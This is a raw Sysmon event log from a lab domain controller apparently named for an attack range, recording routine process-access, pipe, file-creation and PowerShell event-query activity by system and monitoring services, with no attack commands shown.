12:01:08.410{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:08.377{266CAFBE-6484-6064-7200-00000000AE01}4296\PSHost.132616656683152351.4296.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.377{266CAFBE-6484-6064-7200-00000000AE01}4296NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_55eahudr.0mn.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.362{266CAFBE-6484-6064-7200-00000000AE01}4296NT 
AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_o1b1kcgw.zcv.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.362{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_o1b1kcgw.zcv.ps12021-03-31 12:01:08.362 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.318{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.316{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.315{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.315{266CAFBE-647E-6064-4300-00000000AE01}39243756C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.315{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 
23542300x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.285{266CAFBE-6482-6064-6A00-00000000AE01}2504NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6485-6064-7300-00000000AE01}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:09.361{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
